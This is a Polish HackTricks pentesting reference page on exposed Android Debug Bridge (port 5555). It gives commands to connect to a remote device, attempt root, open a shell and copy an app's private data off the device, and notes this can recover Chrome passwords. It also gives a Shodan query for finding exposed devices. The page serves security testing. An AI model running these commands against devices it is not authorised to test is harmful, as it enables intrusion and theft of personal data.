5555 - Android Debug Bridge

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź SUBSCRIPTION PLANS!
Zdobądź oficjalne gadżety PEASS & HackTricks
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.

Podstawowe informacje

Z dokumentacji:

Android Debug Bridge (adb) to wszechstronne narzędzie wiersza poleceń, które umożliwia komunikację z urządzeniem. Polecenie adb ułatwia różne działania na urządzeniu, takie jak instalowanie i debugowanie aplikacji, oraz zapewnia dostęp do powłoki Unix, którą można używać do wykonywania różnych poleceń na urządzeniu.

Domyślny port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Połączenie

Jeśli znajdziesz usługę ADB działającą na porcie urządzenia i możesz się do niej podłączyć, możesz uzyskać powłokę wewnątrz systemu:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Aby całkowicie pobrać dane aplikacji, możesz:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Możesz użyć tego triku do odzyskania wrażliwych informacji, takich jak hasła do Chrome. Aby uzyskać więcej informacji na ten temat, sprawdź informacje i odniesienia podane tutaj.

Shodan

android debug bridge